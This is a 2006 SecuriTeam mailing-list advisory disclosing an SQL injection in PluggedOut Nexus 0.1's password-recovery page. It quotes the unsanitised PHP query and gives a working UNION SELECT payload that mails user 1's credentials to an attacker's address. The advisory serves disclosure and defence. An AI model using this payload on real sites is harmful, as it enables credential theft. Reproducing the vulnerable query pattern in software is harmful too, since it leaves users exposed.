From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 5 Mar 2006 14:46:16 +0200
Subject: [UNIX] PluggedOut Nexus SQL injection
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20060305134823.74DFA573E@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
PluggedOut Nexus SQL injection
------------------------------------------------------------------------
SUMMARY
<http://www.pluggedout.com>; Nexus is "an open source script you can run
on your web server to give you a community based website where people can
register, search each others interests, and communicate with one another
either through a private messaging system, or via chat". An SQL injection
vulnerability in the Nexus PluggedOut product allows remote attackers to
gain access to the hashed password of any user they desire.
DETAILS
Vulnerable Systems:
* PluggedOut Nexus version 0.1
The forgotten_password.php file doesn't not properly sanitize the 'email'
parameter, allowing remote attackers to inject arbitrary SQL into the
file's password recovery SQL statement.
Vulnerable code:
The following lines in "forgotten_password.php" :
if ($_POST["submit"]!=""){
$con = db_connect();
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM nexus_users
WHERE cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
if ($result!=false){
if (mysql_num_rows($result)>0){
$row = mysql_fetch_array($result);
$from = $site_admin_email;
$to = $row["cEMailPrivate"];
$subject = "Reminder Username/Password from
".$site_long_name."";
$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
."Your account details are as follows;\n"
." Username : ".$row["cUsername"]."\n"
." Password : ".$row["cPassword"]."\n\n"
."If you did not request this reminder
message, please contact the ".$site_long_name." administrator
(".$admin_email.")\n";
send_email($from,$to,$subject,$body);
Exploit:
Insert the following SQL statement into the email address
hamidnetworksecurityteam' union select
cUsername,cPassword,'[email protected]' from nexus_users WHERE
nUserId=1 and '1'='1
Which will cause the [email protected] to receive an email that
contains the username & password for userID=1.
ADDITIONAL INFORMATION
The original article can be found at: <http://hamid.ir/security/>;
http://hamid.ir/security/
The information has been provided by <mailto:het_ebadi@yahoo.com.> h e.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
